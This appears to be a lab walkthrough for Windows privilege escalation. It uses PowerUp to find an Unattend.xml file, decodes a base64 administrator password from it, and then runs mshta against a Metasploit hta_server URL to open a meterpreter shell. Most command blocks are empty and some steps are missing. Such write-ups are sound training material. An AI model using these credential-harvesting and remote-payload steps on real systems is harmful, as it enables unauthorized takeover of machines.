PowerUp Privilege Escalation
Unintended Installation
Step 1: We will run the powerup.ps1 Powershell script to find privilege escalation vulnerability.
Step 2: Import PowerUp.ps1 script and Invoke-PrivescAudit function.
We can notice that there is an Unattend.xml file present on the system. Open the Unattend.xml file.
Unattend.xml: Unattend.xml is an answer file for installation. The files may contain encoded or plain-text credentials and other sensitive information.
Step 5: Reading Unattend.xml file.
Command:
We have discovered an administrator encoded password. i.e “QWRtaW5AMTIz”.
Step 6: Decoding administrator password using Powershell.
Commands:
The administrator password is “Admin@123”.
Step 7: We are running a command prompt as an administrator user using discover credentials.
Commands:
We are running cmd.exe as an administrator.
Switch to the Kali Machine.
Step 8: Running the hta_server module to gain the meterpreter shell. Start msfconsole.
Commands:
“This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.”
Copy the generated payload i.e “http://10.10.31.2:8080/Bn75U0NL8ONS.hta” and run it on cmd.exe with mshta command to gain the meterpreter shell.
Switch to Target Machine.
Step 9: Gaining a meterpreter shell.
Command:
Note: You need to use your own metasploit HTA server link.
We can expect a meterpreter shell.
Step 10: Find the flag.
Commands:
This reveals the flag to us.
Last updated